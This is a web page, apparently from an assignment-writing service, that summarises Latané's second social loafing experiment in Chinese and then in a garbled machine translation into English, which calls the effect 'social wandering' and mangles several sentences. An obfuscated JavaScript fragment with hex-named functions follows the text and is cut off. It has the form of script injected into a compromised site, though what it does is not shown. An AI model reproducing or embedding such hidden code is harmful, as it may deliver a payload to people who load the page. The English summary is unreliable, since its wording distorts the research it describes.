
在第二项研究中,研究人员试图测试是否仅仅认为他们是一个群体的一部分就足以导致社交游荡。 为了测试这一点,研究人员让参与者戴上眼罩和耳机,并告诉他们其他参与者会与他们一起大喊大叫(实际上,其他参与者没有得到大喊大叫的指示)。 当参与者认为他们是作为一个团体的一部分(但实际上是在“假”组中并且真的在自己大喊大叫)时,他们没有像他们认为他们单独喊叫时那么响亮。 重要的是,Latané及其同事的第二项研究得出了小组工作如此无效的原因。 心理学家假设小组工作无效的部分原因是协调损失(即小组成员没有有效协调他们的行为),而这部分是由于人们在小组的一部分时投入较少的努力(即社交游荡))。 新西兰环卡托大学Assignment代写:社交游荡 In the second study, the researchers tried to test whether just thinking that they were part of a group was enough to cause social wandering. To test this, the researchers asked the participants to wear eye masks and headphones and told them that other participants would yell with them (in fact, other participants did not get an yelling instruction). When participants thought they were part of a group (but actually in the "fake" group and really yelled at themselves), they were not as loud as they thought they were shouting alone. Importantly, the second study by Latané and colleagues came up with the reason why the group work was so ineffective. Part of the reason that psychologists assume that team work is ineffective is to coordinate losses (that is, team members do not effectively coordinate their behavior), in part because people put less effort (ie social wandering) on a part of the group). function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let...
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